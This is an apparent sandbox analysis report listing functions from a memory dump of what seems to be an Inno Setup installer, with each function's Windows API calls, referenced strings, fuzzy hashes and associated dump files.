Opcode Fuzzy Hash: f9589785e3a2c896c84c0147047eb20fceea969faa9c834ceed2f7dffbcdc7f9
Instruction Fuzzy Hash: BC31B170A04700AFD711EBA9C885A9E77ECFB4D314F1148AAF804E33A1D638AD00DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0046335C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0046339B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 004633B9
GetWindowPlacement.USER32(?,0000002C), ref: 004633EF
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00463413

Strings

,, xrefs: 004633DD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 70142e43902542f6b181c0d475d1259aff037c5e475c9efdb15c090ca1694d0e
Instruction ID: 175857a8f66be85dff5b254cde1ebf989d36374ce012c1fc9b2fffc776e7af13
Opcode Fuzzy Hash: 70142e43902542f6b181c0d475d1259aff037c5e475c9efdb15c090ca1694d0e
Instruction Fuzzy Hash: E7214F71A00244ABCF54EF6DC8C499E77A8AF09315F00846AFD18EF346E779ED448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C0BC0, Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0C8F
SetErrorMode.KERNEL32(00000001,00000000,004C0D8C), ref: 004C0BFC

Part of subcall function 004BF530: SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000200), ref: 004BF555

Part of subcall function 004C0FEC: SendMessageW.USER32(00000000,0000113F,00000000), ref: 004C1037

FindNextFileW.KERNEL32(000000FF,?,00000000,004C0D41,?,00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D21
FindClose.KERNEL32(000000FF,004C0D48,004C0D41,?,00000000,?,00000000,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D3B

Part of subcall function 004C05DC: SendMessageW.USER32(00000000,00001132,00000000,?), ref: 004C06C2

SetErrorMode.KERNEL32(?,004C0D66,004C0D5F,?,00000001,00000000,004C0D8C), ref: 004C0D59

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorMessageModeSend$CloseFirstInfoNext
String ID:
API String ID: 2376185272-0
Opcode ID: 533ee44c0d0b3ee8ec863e2940adb7a47ed5ab89265e936dad62646711958313
Instruction ID: 7e4bd4ec4f0f77a230d10517dd002f12573b4f33877a00e5ba4ab44c0602116b
Opcode Fuzzy Hash: 533ee44c0d0b3ee8ec863e2940adb7a47ed5ab89265e936dad62646711958313
Instruction Fuzzy Hash: B6419035A08218DFCB50EFA5CC85A9EB7B9EB48304F5045FEF409A7381D739AE45CA58

Uniqueness

Uniqueness Score: -1.00%

Function 004C107C, Relevance: 7.6, APIs: 5, Instructions: 132fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,004C1272), ref: 004C1103
FindFirstFileW.KERNEL32(00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C1149
FindNextFileW.KERNEL32(000000FF,?,00000000,004C1222,?,00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C11FE
FindClose.KERNEL32(000000FF,004C1229,004C1222,?,00000000,?,00000000,004C1240,?,00000001,00000000,004C1272), ref: 004C121C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 4fcc882513897c6fdb4f92f068723be0bd7c979de30b9bd6cf79b5c7838bb8e6
Instruction ID: 2a8789369dbeb2033d079400e39f2ab1ede8b867783cb7895bd506eac8688779
Opcode Fuzzy Hash: 4fcc882513897c6fdb4f92f068723be0bd7c979de30b9bd6cf79b5c7838bb8e6
Instruction Fuzzy Hash: DC415239A042189FCB10EF66CC85A9EB7B8FB49314F5085EEE808E3352D7399E45CE54

Uniqueness

Uniqueness Score: -1.00%

Function 004808CC, Relevance: 7.5, APIs: 5, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004AD778,00000000,004AD799), ref: 004808EE
DeviceIoControl.KERNEL32 ref: 00480918
GetLastError.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 00480925
CloseHandle.KERNEL32(00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000), ref: 0048092D
SetLastError.KERNEL32(00000000,00000000,00000000,0009C040,?,00000002,00000000,00000000,?,00000000,00000000,C0000000,00000001,00000000,00000003,02000000), ref: 00480933

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: 1226a10af20e9d5b195a4caa3779458aa7f93df170cad0a6f187666edb385bde
Instruction ID: 757201d374c544a68746b83c475efb3820bba70b78ff77d633849ce88f686b7b
Opcode Fuzzy Hash: 1226a10af20e9d5b195a4caa3779458aa7f93df170cad0a6f187666edb385bde
Instruction Fuzzy Hash: 43F06DB279422039F121626A1C82FBF118C9B85BA8F51453AF604FB1D2D5A99D0A526D

Uniqueness

Uniqueness Score: -1.00%

Function 004A1A3C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,004A1C86,?,?,?,?,00000000,00000000), ref: 004A1BB3
LoadLibraryW.KERNEL32(00000000,?,?,?,00000000,004A1C86,?,?,?,?,00000000,00000000), ref: 004A1BC5
GetProcAddress.KERNEL32(00000000,00000000), ref: 004A1C35

Strings

<utf8>, xrefs: 004A1B66

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProc
String ID: <utf8>
API String ID: 1469910268-2377197763
Opcode ID: b781309f96ba1e4422e9ef4e93870b08a44e3f56c274b0227328c2f5e2670bd2
Instruction ID: 6d6b1b89222b3d5005054f689de362d71fe02d1583d406a5c703ad6b3b819fe0
Opcode Fuzzy Hash: b781309f96ba1e4422e9ef4e93870b08a44e3f56c274b0227328c2f5e2670bd2
Instruction Fuzzy Hash: C4616B70A001099FDB00EBA5C485B9FB7F5EF59318F54817AE404AB3A6DA78AE418B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DBCC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

MonitorFromWindow, xrefs: 0042DBE3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: MonitorFromWindow
API String ID: 190572456-2842599566
Opcode ID: a339373b2ea78f162fc64ceb30bb40eeff9566ac8625277b9692d286750af45a
Instruction ID: 09b7f80d8916beb450250fae5da5f9838b842c5b57be028bf6a572ef599346e3
Opcode Fuzzy Hash: a339373b2ea78f162fc64ceb30bb40eeff9566ac8625277b9692d286750af45a
Instruction Fuzzy Hash: 8701AD72A041286ACB10EB52EC85ABFB35CDB04304B800027F810A7282DBBC9D09D3AA

Uniqueness

Uniqueness Score: -1.00%

Function 004E6860, Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004E68AC
GetWindowLongW.USER32(00000000,000000F0), ref: 004E68CC
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0050BCD4,004E5BED), ref: 004E68F0
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0050BCD4,004E5BED), ref: 004E6906

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: 24ad5f1c2ccc1fd1556715a85e46cf431787b68a1530600a22a6f8be02d7eb8a
Instruction ID: a847ca98897582b3150dd86ac0abc1687278606cd50f6e12ca4dcc02c7302f4a
Opcode Fuzzy Hash: 24ad5f1c2ccc1fd1556715a85e46cf431787b68a1530600a22a6f8be02d7eb8a
Instruction Fuzzy Hash: 301130B46016809FD710EF6AD885B6A33E86B15345F050467F9419B3A3CA3DDC68EB1A

Uniqueness

Uniqueness Score: -1.00%

Function 004328A4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000,00000000,00434D0B,?,00000000,00000054,?,00000000), ref: 004328C4
FormatMessageW.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000), ref: 004328EA

Strings

8B, xrefs: 00432911

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID: 8B
API String ID: 3479602957-4165284811
Opcode ID: b9b18f56e8c7b98fc6c45eea2eb42fcaaf3aa21852c179f19d793cb319631204
Instruction ID: 287b00f6fbc44408d1deb48b84d0f04d1ce37634cb89fa4247d01634c909129f
Opcode Fuzzy Hash: b9b18f56e8c7b98fc6c45eea2eb42fcaaf3aa21852c179f19d793cb319631204
Instruction Fuzzy Hash: 9001ACB07047095AE721FB618D52BDA72ACDF0C704F9140BBB604A62D2DAB8AD41891C

Uniqueness

Uniqueness Score: -1.00%

Function 0047A500, Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0047A50C
GetCursorPos.USER32(?,00000000,00000064), ref: 0047A529
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0047A549

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait
String ID:
API String ID: 1359611202-0
Opcode ID: c3825cbfbb0fce71f61fa2a5937f100f6191f94a8ccc55f7865f3cb6f4fafa16
Instruction ID: b085e44beee730e3645b7972984611c6b32b386b080458ef1046c60807020b85
Opcode Fuzzy Hash: c3825cbfbb0fce71f61fa2a5937f100f6191f94a8ccc55f7865f3cb6f4fafa16
Instruction Fuzzy Hash: 5BF0B431544304AAEB14A766D886BDE33E8FB45314F504027E504972D2D77C9C50CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004629EC, Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00462A24
GetCapture.USER32 ref: 00462A2D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 201650b5fbd0e2d90c744b81722c7441c4f55fc64f4f176e00ec4b6230af2621
Instruction ID: 5ad91f7f634b7bc75800b6c2637611c91fc1552889c671418f97189261b6e815
Opcode Fuzzy Hash: 201650b5fbd0e2d90c744b81722c7441c4f55fc64f4f176e00ec4b6230af2621
Instruction Fuzzy Hash: 05115E32B10605ABDB30DB99CA85D6A73E4EF04308B24407AE404DB752E7BCEE449759

Uniqueness

Uniqueness Score: -1.00%

Function 00480E38, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 00480E45
SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 00480E55

Part of subcall function 00409458: CreateMutexW.KERNEL32(?,00000001,00000000,?,004FE333,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?), ref: 0040946E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$CreateDaclInitializeMutex
String ID:
API String ID: 3525989157-0
Opcode ID: ec6f704e82f184868277b8f2a7b4cd1560981572a3d01120b1391ccfa740d282
Instruction ID: bfdd17de1d08f15f1eb1e8bd115aa5957c8100b125f9989b3268e9b648247d5b
Opcode Fuzzy Hash: ec6f704e82f184868277b8f2a7b4cd1560981572a3d01120b1391ccfa740d282
Instruction Fuzzy Hash: 18E0E5B1A443006FD700DFB58C42F5A76DC9B84714F11493EB564E62C2E679D90987AA

Uniqueness

Uniqueness Score: -1.00%

Function 004CCEA4, Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000003,00000000), ref: 004CCEB1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 0e8e192479bca8ef54a575cd7ffc2d42735539dcf867c54c3383cc2b670606b4
Instruction ID: c49764182c9786475819d2bf78612184c4173c9d3b3f818adbddd19a1c3aad9e
Opcode Fuzzy Hash: 0e8e192479bca8ef54a575cd7ffc2d42735539dcf867c54c3383cc2b670606b4
Instruction Fuzzy Hash: A2D0C76160420917C70095EA5C815AAB39C7748214F44077AAD1DE37C5FD75591441A5

Uniqueness

Uniqueness Score: -1.00%

Function 00470A2C, Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00470A48

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: f76e5970be86353728f5777092b2c2d2ddc29d7ef8c624a474a584325eb60d3a
Instruction ID: 43d3b676a681cc8dd192a57e008d754785de3d61f70c2e5714767b9bbbcc4d3d
Opcode Fuzzy Hash: f76e5970be86353728f5777092b2c2d2ddc29d7ef8c624a474a584325eb60d3a
Instruction Fuzzy Hash: 78C01270510140CBDB01D738C4D0E893375B765305FE08696E00887452C338DC49D694

Uniqueness

Uniqueness Score: -1.00%

Function 00438998, Relevance: 86.0, APIs: 1, Strings: 48, Instructions: 268libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(uxtheme.dll,00000000,00438D4A), ref: 004389CD

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

Strings

GetThemeSysString, xrefs: 00438C41
GetThemePosition, xrefs: 00438B57
SetThemeAppProperties, xrefs: 00438CD1
SetWindowTheme, xrefs: 00438BC3
GetThemeBackgroundContentRect, xrefs: 00438A25
EnableThemeDialogTexture, xrefs: 00438C9B
EnableTheming, xrefs: 00438D19
CloseThemeData, xrefs: 004389EF
GetThemeSysColorBrush, xrefs: 00438BF9
GetThemeColor, xrefs: 00438AEB
OpenThemeData, xrefs: 004389DD
GetThemeBackgroundRegion, xrefs: 00438A7F
DrawThemeEdge, xrefs: 00438AA3
GetThemeIntList, xrefs: 00438B9F
GetThemeBackgroundExtent, xrefs: 00438A37
DrawThemeBackground, xrefs: 00438A01
DrawThemeIcon, xrefs: 00438AB5
DrawThemeParentBackground, xrefs: 00438D07
IsThemeActive, xrefs: 00438C65
IsThemeBackgroundPartiallyTransparent, xrefs: 00438AD9
GetThemeSysColor, xrefs: 00438BE7
GetWindowTheme, xrefs: 00438C89
GetThemeSysInt, xrefs: 00438C53
GetThemeMetric, xrefs: 00438AFD
GetThemeBool, xrefs: 00438B21
uxtheme.dll, xrefs: 004389C8
GetThemeSysFont, xrefs: 00438C2F
GetThemeTextExtent, xrefs: 00438A5B
GetThemeInt, xrefs: 00438B33
GetThemeSysSize, xrefs: 00438C1D
IsAppThemed, xrefs: 00438C77
GetThemeDocumentationProperty, xrefs: 00438CF5
HitTestThemeBackground, xrefs: 00438A91
DrawThemeText, xrefs: 00438A13
GetThemeFont, xrefs: 00438B69
GetCurrentThemeName, xrefs: 00438CE3
GetThemeTextMetrics, xrefs: 00438A6D
GetThemePartSize, xrefs: 00438A49
GetThemeRect, xrefs: 00438B7B
GetThemeMargins, xrefs: 00438B8D
IsThemeDialogTextureEnabled, xrefs: 00438CAD
IsThemePartDefined, xrefs: 00438AC7
GetThemeEnumValue, xrefs: 00438B45
GetThemeString, xrefs: 00438B0F
GetThemeAppProperties, xrefs: 00438CBF
GetThemeFilename, xrefs: 00438BD5
GetThemeSysBool, xrefs: 00438C0B
GetThemePropertyOrigin, xrefs: 00438BB1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
